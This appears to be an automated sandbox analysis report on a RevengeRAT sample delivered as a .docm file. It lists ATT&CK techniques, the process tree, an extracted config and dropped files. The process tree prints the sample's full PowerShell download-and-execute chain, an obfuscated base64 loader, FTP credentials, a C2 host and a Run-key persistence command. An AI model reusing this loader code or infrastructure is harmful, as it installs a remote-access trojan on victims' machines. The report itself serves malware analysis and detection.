revengerat | 27e17bc7efc2513c75ecc1d8dac97187ca4b3f6d6aa2113e814e66ea5d2cb696

Analysis

max time kernel
127s
max time network
149s
platform
windows10-2004_x64
resource
win10v2004-20240802-en
resource tags

arch:x64arch:x86image:win10v2004-20240802-enlocale:en-usos:windows10-2004-x64system
submitted
23-09-2024 22:39

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

27e17bc7efc2513c75ecc1d8dac97187ca4b3f6d6aa2113e814e66ea5d2cb696.docm
Size

124KB
MD5

cc0f9cc1f9133b0f5dd045a34b2d7ae1
SHA1

c41f1c79442c0e2b717473f9c40d395176afffdb
SHA256

27e17bc7efc2513c75ecc1d8dac97187ca4b3f6d6aa2113e814e66ea5d2cb696
SHA512

154c2ddc43ba72e1f166dc025e20ef5c580e1f490f1828496c1f10f8ef17b4432137740c66552d12cb647499e9ad7d5a62e5ab709ed2bcd9d08d2416b475c3da
SSDEEP

1536:vkc9anle9tQVTGH7gPgP8MDw/jlQx1JE7vReOr0l77CXXNaHsdUXSIt98iuBXFtc:vVWqQVtClwH9r0l77AnsSmy/BVtqxp

Score

10^/10

revengerat nyancatrevenge defense_evasion discovery execution persistence trojan

Malware Config

Extracted

Language

ps1

Source

URLs

exe.dropper

https://drive.google.com/uc?export=download&id=

Extracted

Credentials

Protocol: ftp
Host:
ftp.desckvbrat.com.br
Port:
21
Username:
desckvbrat1
Password:
developerpro21578Jp@@

Extracted

Family

revengerat

Botnet

NyanCatRevenge

marcelotatuape.ddns.net:333

Mutex

b25e533944db469

Signatures

Process spawned unexpected child process 1 IoCs

This typically indicates the parent process was compromised via an exploit or macro.

description	pid	pid_target	Process	procid_target
Parent C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE is not expected to spawn this process	4020	4828	powershell.exe	88

RevengeRAT
Remote-access trojan with a wide range of capabilities.
trojan revengerat

Blocklisted process makes network request 9 IoCs

flow	pid	Process
55	4020	powershell.exe
57	4020	powershell.exe
61	1852	powershell.exe
64	1852	powershell.exe
66	1852	powershell.exe
67	1852	powershell.exe
70	1852	powershell.exe
71	1852	powershell.exe
74	4464	powershell.exe

Checks computer location settings 2 TTPs 1 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\USER\S-1-5-21-2170637797-568393320-3232933035-1000\Control Panel\International\Geo\Nation	WScript.exe

Adds Run key to start application 2 TTPs 1 IoCs

persistence

Registry Run Keys / Startup Folder

T1547.001

Modify Registry

T1112

description	ioc	Process
Set value (str)	\REGISTRY\USER\S-1-5-21-2170637797-568393320-3232933035-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Update Drivers NVIDEO_w = "cmd.exe /c start /min \"\" Powershell.exe -WindowStyle Hidden -ExecutionPolicy Bypass -Comman \". 'C:\\Users\\Admin\\AppData\\Local\\Microsoft\\LocalLow\\System Update\\ohzaw.ps1' \";exit"	powershell.exe

Command and Scripting Interpreter: PowerShell 1 TTPs 4 IoCs

Using powershell.exe command.

execution

PowerShell

T1059.001

pid	Process
4120	powershell.exe
1852	powershell.exe
2848	powershell.exe
4464	powershell.exe

Indicator Removal: File Deletion 1 TTPs
Adversaries may delete files left behind by the actions of their intrusion activity.
defense_evasion

File Deletion
T1070.004

Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs

Web Service

T1102

flow	ioc
73	pastebin.com
74	pastebin.com

Drops file in System32 directory 1 IoCs

description	ioc	Process
File opened for modification	C:\Windows\System32\%AppData%\Microsoft\Windows\Start Menu\Programs\Windows PowerShell\Windows PowerShell.lnk	powershell.exe

Suspicious use of SetThreadContext 1 IoCs

description	pid	Process	procid_target
PID 4464 set thread context of 4248	4464	powershell.exe	114

Command and Scripting Interpreter: JavaScript 1 TTPs
execution

JavaScript
T1059.007
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

System Location Discovery: System Language Discovery 1 TTPs 1 IoCs

Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

discovery

System Language Discovery

T1614.001

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	RegAsm.exe

Checks processor information in registry 2 TTPs 5 IoCs

Processor information is often read in order to detect sandboxing environments.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0	WINWORD.EXE
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz	WINWORD.EXE
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	WINWORD.EXE
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\SYSTEM\CENTRALPROCESSOR\0	RegAsm.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	RegAsm.exe

Enumerates system info in registry 2 TTPs 3 IoCs

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\BIOS	WINWORD.EXE
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemFamily	WINWORD.EXE
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU	WINWORD.EXE

Modifies registry class 1 IoCs

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-21-2170637797-568393320-3232933035-1000_Classes\Local Settings	explorer.exe

Suspicious behavior: AddClipboardFormatListener 2 IoCs

pid	Process
4828	WINWORD.EXE
4828	WINWORD.EXE

Suspicious behavior: EnumeratesProcesses 13 IoCs

pid	Process
4020	powershell.exe
4020	powershell.exe
4120	powershell.exe
4120	powershell.exe
1852	powershell.exe
1852	powershell.exe
1852	powershell.exe
1852	powershell.exe
2848	powershell.exe
2848	powershell.exe
4464	powershell.exe
4464	powershell.exe
4464	powershell.exe

Suspicious use of AdjustPrivilegeToken 5 IoCs

description	pid	Process
Token: SeDebugPrivilege	4020	powershell.exe
Token: SeDebugPrivilege	4120	powershell.exe
Token: SeDebugPrivilege	1852	powershell.exe
Token: SeDebugPrivilege	2848	powershell.exe
Token: SeDebugPrivilege	4464	powershell.exe

Suspicious use of SetWindowsHookEx 7 IoCs

pid	Process
4828	WINWORD.EXE
4828	WINWORD.EXE
4828	WINWORD.EXE
4828	WINWORD.EXE
4828	WINWORD.EXE
4828	WINWORD.EXE
4828	WINWORD.EXE

Suspicious use of WriteProcessMemory 24 IoCs

description	pid	Process	procid_target
PID 4828 wrote to memory of 4020	4828	WINWORD.EXE	102
PID 4828 wrote to memory of 4020	4828	WINWORD.EXE	102
PID 4020 wrote to memory of 4812	4020	powershell.exe	105
PID 4020 wrote to memory of 4812	4020	powershell.exe	105
PID 4224 wrote to memory of 2128	4224	explorer.exe	107
PID 4224 wrote to memory of 2128	4224	explorer.exe	107
PID 2128 wrote to memory of 4120	2128	WScript.exe	108
PID 2128 wrote to memory of 4120	2128	WScript.exe	108
PID 4120 wrote to memory of 1852	4120	powershell.exe	110
PID 4120 wrote to memory of 1852	4120	powershell.exe	110
PID 1852 wrote to memory of 2848	1852	powershell.exe	111
PID 1852 wrote to memory of 2848	1852	powershell.exe	111
PID 1852 wrote to memory of 4464	1852	powershell.exe	112
PID 1852 wrote to memory of 4464	1852	powershell.exe	112
PID 1852 wrote to memory of 1696	1852	powershell.exe	113
PID 1852 wrote to memory of 1696	1852	powershell.exe	113
PID 4464 wrote to memory of 4248	4464	powershell.exe	114
PID 4464 wrote to memory of 4248	4464	powershell.exe	114
PID 4464 wrote to memory of 4248	4464	powershell.exe	114
PID 4464 wrote to memory of 4248	4464	powershell.exe	114
PID 4464 wrote to memory of 4248	4464	powershell.exe	114
PID 4464 wrote to memory of 4248	4464	powershell.exe	114
PID 4464 wrote to memory of 4248	4464	powershell.exe	114
PID 4464 wrote to memory of 4248	4464	powershell.exe	114

C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE
"C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\27e17bc7efc2513c75ecc1d8dac97187ca4b3f6d6aa2113e814e66ea5d2cb696.docm" /o ""
1⤵
- Checks processor information in registry
- Enumerates system info in registry
- Suspicious behavior: AddClipboardFormatListener
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:4828
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" wget https://www.4sync.com/web/directDownload/CE3CTlT9/DlRvs8N_.dc5ccedf8d8817fc5fe4f69239307383 -o test.js; explorer.exe test.js
  2⤵
  - Process spawned unexpected child process
  - Blocklisted process makes network request
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  PID:4020
- - C:\Windows\explorer.exe
    "C:\Windows\explorer.exe" test.js
    3⤵
    PID:4812

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-US --service-sandbox-type=asset_store_service --field-trial-handle=4152,i,3387628439405076340,17957358341235678872,262144 --variations-seed-version --mojo-platform-channel-handle=4208 /prefetch:8
1⤵
PID:2348

C:\Windows\explorer.exe
C:\Windows\explorer.exe /factory,{75dff2b7-6936-4c06-a8bb-676a7b00b24b} -Embedding
1⤵
- Modifies registry class
- Suspicious use of WriteProcessMemory
PID:4224
- C:\Windows\System32\WScript.exe
  "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\test.js"
  2⤵
  - Checks computer location settings
  - Suspicious use of WriteProcessMemory
  PID:2128
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $fLbjh = 'JA㍿pAFUAbg㍿KAGEAIAA9ACAAJA㍿oAG8Acw㍿0AC4AVg㍿lAHIAcw㍿pAG8AbgAuAE0AYQ㍿qAG8AcgAuAEUAcQ㍿1AGEAbA㍿zACgAMgApADsASQ㍿mACAAKAAgACQAaQ㍿VAG4ASg㍿hACAAKQAgAHsAJA㍿NAGkAUg㍿JAGQAIAA9ACAAWw㍿TAHkAcw㍿0AGUAbQAuAEkATwAuAFAAYQ㍿0AGgAXQA6ADoARw㍿lAHQAVA㍿lAG0AcA㍿QAGEAdA㍿oACgAKQA7AGQAZQ㍿sACAAKAAkAE0AaQ㍿SAEkAZAAgACsAIAAnAFwAVQ㍿wAHcAaQ㍿uAC4AbQ㍿zAHUAJwApADsAJA㍿SAFkARQ㍿hAEYAIAA9ACAAJw㍿oAHQAdA㍿wAHMAOgAvAC8AZA㍿yAGkAdg㍿lAC4AZw㍿vAG8AZw㍿sAGUALg㍿jAG8AbQAvAHUAYwA/AGUAeA㍿wAG8Acg㍿0AD0AZA㍿vAHcAbg㍿sAG8AYQ㍿kACYAaQ㍿kAD0AJwA7ACQAcw㍿CAGkAaQ㍿XACAAPQAgACQAZQ㍿uAHYAOg㍿QAFIATw㍿DAEUAUw㍿TAE8AUg㍿fAEEAUg㍿DAEgASQ㍿UAEUAQw㍿UAFUAUg㍿FAC4AQw㍿vAG4AdA㍿hAGkAbg㍿zACgAJwA2ADQAJwApADsAaQ㍿mACAAKAAgACQAcw㍿CAGkAaQ㍿XACAAKQAgAHsAJA㍿SAFkARQ㍿hAEYAIAA9ACAAKAAkAFIAWQ㍿FAGEARgAgACsAIAAnADEATg㍿hAHEAZA㍿OAFgAaQ㍿HAHYASQ㍿fAHEAMQ㍿SAFAAaw㍿hAHoARg㍿0AE0AeQ㍿nAG0AYQ㍿xAFQASg㍿YAHUANAAyACcAKQAgADsAfQ㍿lAGwAcw㍿lACAAewAkAFIAWQ㍿FAGEARgAgAD0AIAAoACQAUg㍿ZAEUAYQ㍿GACAAKwAgACcAMQ㍿nADEAag㍿tAFgAdQ㍿zAFgAOQ㍿tAGMAOQ㍿WAG0AaA㍿WAHIASg㍿KADIAWA㍿vAGYAWgAzAGEASw㍿fAGMATA㍿PAHQAJwApACAAOw㍿9ADsAJA㍿JAGEAbw㍿NAGkAIAA9ACAAKAAgAE4AZQ㍿3AC0ATw㍿iAGoAZQ㍿jAHQAIA㍿OAGUAdAAuAFcAZQ㍿iAEMAbA㍿pAGUAbg㍿0ACAAKQAgADsAJA㍿JAGEAbw㍿NAGkALg㍿FAG4AYw㍿vAGQAaQ㍿uAGcAIAA9ACAAWw㍿TAHkAcw㍿0AGUAbQAuAFQAZQ㍿4AHQALg㍿FAG4AYw㍿vAGQAaQ㍿uAGcAXQA6ADoAVQ㍿UAEYAOAAgADsAJA㍿JAGEAbw㍿NAGkALg㍿EAG8Adw㍿uAGwAbw㍿hAGQARg㍿pAGwAZQAoACQAVQ㍿SAEwASw㍿CACwAIAAkAE0AaQ㍿SAEkAZAAgACsAIAAnAFwAVQ㍿wAHcAaQ㍿uAC4AbQ㍿zAHUAJwApACAAOwAkAEEAVQ㍿yAEcARgAgAD0AIAAoACAAJw㍿DADoAXA㍿VAHMAZQ㍿yAHMAXAAnACAAKwAgAFsARQ㍿uAHYAaQ㍿yAG8Abg㍿tAGUAbg㍿0AF0AOgA6AFUAcw㍿lAHIATg㍿hAG0AZQAgACkAOw㍿JAHoAag㍿㍿AFEAIAA9ACAAKAAgACQATQ㍿pAFIASQ㍿kACAAKwAgACcAXA㍿VAHAAdw㍿pAG4ALg㍿tAHMAdQAnACAAKQAgADsAIA㍿wAG8Adw㍿lAHIAcw㍿oAGUAbA㍿sAC4AZQ㍿4AGUAIA㍿3AHUAcw㍿hAC4AZQ㍿4AGUAIA㍿JAHoAag㍿㍿AFEAIAAvAHEAdQ㍿pAGUAdAAgAC8Abg㍿vAHIAZQ㍿zAHQAYQ㍿yAHQAIAA7ACAAQw㍿vAHAAeQAtAEkAdA㍿lAG0AIAAnACUARA㍿DAFAASg㍿VACUAJwAgAC0ARA㍿lAHMAdA㍿pAG4AYQ㍿0AGkAbw㍿uACAAKAAgACQAQQ㍿VAHIARw㍿GACAAKwAgACcAXA㍿㍿AHAAcA㍿EAGEAdA㍿hAFwAUg㍿vAGEAbQ㍿pAG4AZw㍿cAE0AaQ㍿jAHIAbw㍿zAG8AZg㍿0AFwAVw㍿pAG4AZA㍿vAHcAcw㍿cAFMAdA㍿hAHIAdAAgAE0AZQ㍿uAHUAXA㍿QAHIAbw㍿nAHIAYQ㍿tAHMAXA㍿TAHQAYQ㍿yAHQAdQ㍿wACcAIAApACAALQ㍿mAG8Acg㍿jAGUAIAA7AHAAbw㍿3AGUAcg㍿zAGgAZQ㍿sAGwALg㍿lAHgAZQAgAC0AYw㍿vAG0AbQ㍿hAG4AZAAgACcAcw㍿sAGUAZQ㍿wACAAMQA4ADAAJwA7ACAAcw㍿oAHUAdA㍿kAG8Adw㍿uAC4AZQ㍿4AGUAIAAvAHIAIAAvAHQAIAAwACAALw㍿mACAAfQ㍿lAGwAcw㍿lACAAew㍿bAFMAeQ㍿zAHQAZQ㍿tAC4ATg㍿lAHQALg㍿TAGUAcg㍿2AGkAYw㍿lAFAAbw㍿pAG4AdA㍿NAGEAbg㍿hAGcAZQ㍿yAF0AOgA6AFMAZQ㍿yAHYAZQ㍿yAEMAZQ㍿yAHQAaQ㍿mAGkAYw㍿hAHQAZQ㍿WAGEAbA㍿pAGQAYQ㍿0AGkAbw㍿uAEMAYQ㍿sAGwAYg㍿hAGMAawAgAD0AIA㍿7ACQAdA㍿yAHUAZQ㍿9ADsAWw㍿TAHkAcw㍿0AGUAbQAuAE4AZQ㍿0AC4AUw㍿lAHIAdg㍿pAGMAZQ㍿QAG8AaQ㍿uAHQATQ㍿hAG4AYQ㍿nAGUAcg㍿dADoAOg㍿TAGUAYw㍿1AHIAaQ㍿0AHkAUA㍿yAG8AdA㍿vAGMAbw㍿sACAAPQAgAFsAUw㍿5AHMAdA㍿lAG0ALg㍿OAGUAdAAuAFMAZQ㍿jAHUAcg㍿pAHQAeQ㍿QAHIAbw㍿0AG8AYw㍿vAGwAVA㍿5AHAAZQ㍿dADoAOg㍿UAGwAcwAxADIAOwAkAFIAeg㍿XAFcAcgAgAD0AIAAoAE4AZQ㍿3AC0ATw㍿iAGoAZQ㍿jAHQAIA㍿OAGUAdAAuAFcAZQ㍿iAEMAbA㍿pAGUAbg㍿0ACkAOwAkAFIAeg㍿XAFcAcgAuAEUAbg㍿jAG8AZA㍿pAG4AZwAgAD0AIA㍿bAFMAeQ㍿zAHQAZQ㍿tAC4AVA㍿lAHgAdAAuAEUAbg㍿jAG8AZA㍿pAG4AZw㍿dADoAOg㍿VAFQARgA4ADsAJA㍿SAHoAVw㍿XAHIALg㍿DAHIAZQ㍿kAGUAbg㍿0AGkAYQ㍿sAHMAIAA9ACAAbg㍿lAHcALQ㍿vAGIAag㍿lAGMAdAAgAFMAeQ㍿zAHQAZQ㍿tAC4ATg㍿lAHQALg㍿OAGUAdA㍿3AG8Acg㍿rAEMAcg㍿lAGQAZQ㍿uAHQAaQ㍿hAGwAKAAnAGQAZQ㍿zAGMAaw㍿2AGIAcg㍿hAHQAMQAnACwAJw㍿kAGUAdg㍿lAGwAbw㍿wAGUAcg㍿wAHIAbwAyADEANQA3ADgASg㍿wAEAAQAAnACkAOwAkAFYAdA㍿hAEEARgAgAD0AIAAkAFIAeg㍿XAFcAcgAuAEQAbw㍿3AG4AbA㍿vAGEAZA㍿TAHQAcg㍿pAG4AZwAoACAAJw㍿mAHQAcAA6AC8ALw㍿kAGUAcw㍿jAGsAdg㍿iAHIAYQ㍿0ADEAQA㍿mAHQAcAAuAGQAZQ㍿zAGMAaw㍿2AGIAcg㍿hAHQALg㍿jAG8AbQAuAGIAcgAvAFUAcA㍿jAHIAeQ㍿wAHQAZQ㍿yAC8AMAAyAC8ARA㍿MAEwAMAAxAC4AdA㍿4AHQAJwAgACkAOwAkAFIAeg㍿XAFcAcgAuAGQAaQ㍿zAHAAbw㍿zAGUAKAApADsAJA㍿SAHoAVw㍿XAHIAIAA9ACAAKA㍿OAGUAdwAtAE8AYg㍿qAGUAYw㍿0ACAATg㍿lAHQALg㍿XAGUAYg㍿DAGwAaQ㍿lAG4AdAApADsAJA㍿SAHoAVw㍿XAHIALg㍿FAG4AYw㍿vAGQAaQ㍿uAGcAIAA9ACAAWw㍿TAHkAcw㍿0AGUAbQAuAFQAZQ㍿4AHQALg㍿FAG4AYw㍿vAGQAaQ㍿uAGcAXQA6ADoAVQ㍿UAEYAOAA7ACQAVg㍿0AGEAQQ㍿GACAAPQAgACQAUg㍿6AFcAVw㍿yAC4ARA㍿vAHcAbg㍿sAG8AYQ㍿kAFMAdA㍿yAGkAbg㍿nACgAIAAkAFYAdA㍿hAEEARgAgACkAOw㍿bAEIAeQ㍿0AGUAWw㍿dAF0AIAAkAFIAWA㍿pAFYAag㍿fAFkAbA㍿0AEgASwAgAD0AIA㍿bAFMAeQ㍿zAHQAZQ㍿tAC4AQw㍿vAG4Adg㍿lAHIAdA㍿dADoAOg㍿GAHIAbw㍿tAEIAYQ㍿zAGUANgA0AFMAdA㍿yAGkAbg㍿nACgAIAAkAFYAdA㍿hAEEARgAuAFIAZQ㍿wAGwAYQ㍿jAGUAKAAgACcAkyE6AJMhJwAgACwAIAAnAEEAJwAgACkAIAApADsAWw㍿TAHkAcw㍿0AGUAbQAuAEEAcA㍿wAEQAbw㍿tAGEAaQ㍿uAF0AOgA6AEMAdQ㍿yAHIAZQ㍿uAHQARA㍿vAG0AYQ㍿pAG4ALg㍿MAG8AYQ㍿kACgAIAAkAFIAWA㍿pAFYAag㍿fAFkAbA㍿0AEgASwAgACkALg㍿HAGUAdA㍿UAHkAcA㍿lACgAIAAnAEMAbA㍿hAHMAcw㍿MAGkAYg㍿yAGEAcg㍿5ADMALg㍿DAGwAYQ㍿zAHMAMQAnACAAKQAuAEcAZQ㍿0AE0AZQ㍿0AGgAbw㍿kACgAIAAnAHAAcg㍿GAFYASQAnACAAKQAuAEkAbg㍿2AG8Aaw㍿lACgAJA㍿uAHUAbA㍿sACwAIA㍿bAG8AYg㍿qAGUAYw㍿0AFsAXQ㍿dACAAKAAgACcAMgAyACUAOQA2AGMAOAA1ADMANgA1ADYAYgAwADYAYQA1ADYAOA㍿kAGIAMg㍿jADIAMQ㍿hAGUANg㍿jAGIAYgAyADEANQ㍿iADIAMgAlAD0AdgAmAGQAYQ㍿vAGwAbg㍿3AG8AZAA9AGUAYw㍿yAHUAbw㍿zACYAdA㍿4AHQALg㍿0AHgAdAA3ADIAJQA3ADIAJQA4AC0ARg㍿UAFUARAAzACUAQQAyACUAZQ㍿tAGEAbg㍿lAGwAaQ㍿mACsAQgAzACUAMgAyACUAdA㍿4AHQALg㍿0AHgAdAAyADIAJQ㍿EADMAJQ㍿lAG0AYQ㍿uAGUAbA㍿pAGYAKw㍿CADMAJQ㍿0AG4AZQ㍿tAGgAYw㍿hAHQAdA㍿hAD0Abg㍿vAGkAdA㍿pAHMAbw㍿wAHMAaQ㍿kAC0AdA㍿uAGUAdA㍿uAG8AYwAtAGUAcw㍿uAG8AcA㍿zAGUAcgA/AHQAeA㍿0AC4AYwA4ADgANgA3ADAANQAwADAANAA1AGMALQAwAGMANw㍿hAC0AMgA4ADkANAAtAGIAMg㍿hADIALQA2ADMAOQAxAGUAZAAyAGQALw㍿nAHAARQ㍿XAEoAdQ㍿RAHgALw㍿zAG0AZQ㍿0AGkALw㍿tAG8AYwAuAHQAaA㍿nAGkAegAuAG4AZA㍿jAC4AMA㍿uAC4AMQ㍿yAHQALgA3AHAALwAvADoAcw㍿wAHQAdA㍿oACcAIAAsACAAJwAlAEQAQw㍿QAEoAVQAlACcALAAgACcAdA㍿yAHUAZQAxACcAIAApACAAKQA7AH0AOwA=';$fLbjh = $fLbjh.replace('㍿','B') ;$fLbjh = [System.Convert]::FromBase64String( $fLbjh ) ;;;$fLbjh = [System.Text.Encoding]::Unicode.GetString( $fLbjh ) ;$fLbjh = $fLbjh.replace('%DCPJU%','C:\Users\Admin\AppData\Local\Temp\test.js') ;powershell $fLbjh
    3⤵
    - Command and Scripting Interpreter: PowerShell
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of WriteProcessMemory
    PID:4120
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$iUnJa = $host.Version.Major.Equals(2);If ( $iUnJa ) {$MiRId = [System.IO.Path]::GetTempPath();del ($MiRId + '\Upwin.msu');$RYEaF = 'https://drive.google.com/uc?export=download&id=';$sBiiW = $env:PROCESSOR_ARCHITECTURE.Contains('64');if ( $sBiiW ) {$RYEaF = ($RYEaF + '1NaqdNXiGvI_q1RPkazFtMygmaqTJXu42') ;}else {$RYEaF = ($RYEaF + '1g1jmXusX9mc9VmhVrJJ2XofZ3aK_cLOt') ;};$IaoMi = ( New-Object Net.WebClient ) ;$IaoMi.Encoding = [System.Text.Encoding]::UTF8 ;$IaoMi.DownloadFile($URLKB, $MiRId + '\Upwin.msu') ;$AUrGF = ( 'C:\Users\' + [Environment]::UserName );IzjAQ = ( $MiRId + '\Upwin.msu' ) ; powershell.exe wusa.exe IzjAQ /quiet /norestart ; Copy-Item 'C:\Users\Admin\AppData\Local\Temp\test.js' -Destination ( $AUrGF + '\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup' ) -force ;powershell.exe -command 'sleep 180'; shutdown.exe /r /t 0 /f }else {[System.Net.ServicePointManager]::ServerCertificateValidationCallback = {$true};[System.Net.ServicePointManager]::SecurityProtocol = [System.Net.SecurityProtocolType]::Tls12;$RzWWr = (New-Object Net.WebClient);$RzWWr.Encoding = [System.Text.Encoding]::UTF8;$RzWWr.Credentials = new-object System.Net.NetworkCredential('desckvbrat1','developerpro21578Jp@@');$VtaAF = $RzWWr.DownloadString( 'ftp://[email protected]/Upcrypter/02/DLL01.txt' );$RzWWr.dispose();$RzWWr = (New-Object Net.WebClient);$RzWWr.Encoding = [System.Text.Encoding]::UTF8;$VtaAF = $RzWWr.DownloadString( $VtaAF );[Byte[]] $RXiVj_YltHK = [System.Convert]::FromBase64String( $VtaAF.Replace( '↓:↓' , 'A' ) );[System.AppDomain]::CurrentDomain.Load( $RXiVj_YltHK ).GetType( 'ClassLibrary3.Class1' ).GetMethod( 'prFVI' ).Invoke($null, [object[]] ( '22%96c853656b06a568db2c21ae6cbb215b22%=v&daolnwod=ecruos&txt.txt72%72%8-FTUD3%A2%emanelif+B3%22%txt.txt22%D3%emanelif+B3%tnemhcatta=noitisopsid-tnetnoc-esnopser?txt.c8867050045c-0c7a-2894-b2a2-6391ed2d/gpEWJuQx/smeti/moc.thgiz.ndc.0n.1rt.7p//:sptth' , 'C:\Users\Admin\AppData\Local\Temp\test.js', 'true1' ) );};"
      4⤵
      Blocklisted process makes network request
      Command and Scripting Interpreter: PowerShell
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      Suspicious use of WriteProcessMemory
      PID:1852
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -ExecutionPolicy Bypass -file "C:\Users\Admin\AppData\Local\Microsoft\LocalLow\System Update\\x2.ps1"
        5⤵
        Adds Run key to start application
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:2848
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell.exe -ExecutionPolicy Bypass -File "C:\Users\Admin\AppData\Local\Microsoft\LocalLow\System Update\ohzaw.ps1"
        5⤵
        Blocklisted process makes network request
        Command and Scripting Interpreter: PowerShell
        Drops file in System32 directory
        Suspicious use of SetThreadContext
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        Suspicious use of WriteProcessMemory
        
        PID:4464
      - C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
        
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
        6⤵
        System Location Discovery: System Language Discovery
        Checks processor information in registry
        
        PID:4248
    - - C:\Windows\system32\cmd.exe
        
        cmd.exe /c del "C:\Users\Admin\AppData\Local\Temp\test.js"
        5⤵
        
        PID:1696

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

JavaScript

T1059.007

PowerShell

T1059.001

Persistence

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Privilege Escalation

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Defense Evasion

Indicator Removal

T1070

File Deletion

T1070.004

Modify Registry

T1112

Credential Access

Discovery

Query Registry

T1012

System Information Discovery

T1082

System Location Discovery

T1614

System Language Discovery

T1614.001

Lateral Movement

Collection

Command and Control

Web Service

T1102

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

Filesize
2KB

MD5
2f57fde6b33e89a63cf0dfdd6e60a351

SHA1
445bf1b07223a04f8a159581a3d37d630273010f

SHA256
3b0068d29ae4b20c447227fbf410aa2deedfef6220ccc3f698f3c7707c032c55

SHA512
42857c5f111bfa163e9f4ea6b81a42233d0bbb0836ecc703ce7e8011b6f8a8eca761f39adc3ed026c9a2f99206d88bab9bddb42da9113e478a31a6382af5c220

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\LocalLow\System Update\ohzaw.ps1

Filesize
132KB

MD5
5d6acf998701782dbc41e3cca20839ae

SHA1
8fa365fd0df099df35d06bc9178d435ad2a9f472

SHA256
e9732ebc6fee2eee5b41a6ab019c68acf833204545cfe8e51b9f5df910e9c40f

SHA512
9da884483ae247825a9c5cca776cfe8674efae433ad82d17bbcef21349be1e9c51ca0101c5858be0deee5f1ccb72042ddecbfbd2523c34ab617cad15cb10fe93

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\LocalLow\System Update\x2.ps1

Filesize
334B

MD5
43ecd64ad30da4558f6d5e247e42b0a9

SHA1
5084006afdb4b271c83e6103201f09df6b0ff99e

SHA256
390ed5253dfd8c0efe7818f36ed61a542e5042ae1092a245f9a53756c370356a

SHA512
01d62dbb3bf52359ce4b128618f04322f8393fa77170914cdf6b14b552ad396c2edff7421851bc18419ae6e0d7353be912be835225facda19aa654012ea8a1c8

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
0a6f0244675ef49c0fa9297e70959ea4

SHA1
f1da5326b436870c60d57c54f822de0616408a39

SHA256
fbd1f0d08743ca6a07941ff1fd4dbb7e887b569d29bf0974745f259e5fe5706d

SHA512
686ccd802a8b3865ff9448b400b7933a5ffbc479a09379d56f98cc1b837847b09fd46ca890327b348d7ab35650c5edede6fcaac59e5bf29ba2573b835baa6d3b

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
64B

MD5
9a7d3bb176d12431f6d8fac767576719

SHA1
cf2c3e272d7bdaf2e29e45d84cf4c628462418f0

SHA256
5dd2986d1c8293107013be3d92d171b6659c7315952bfcd2d1c3c9344b0a76aa

SHA512
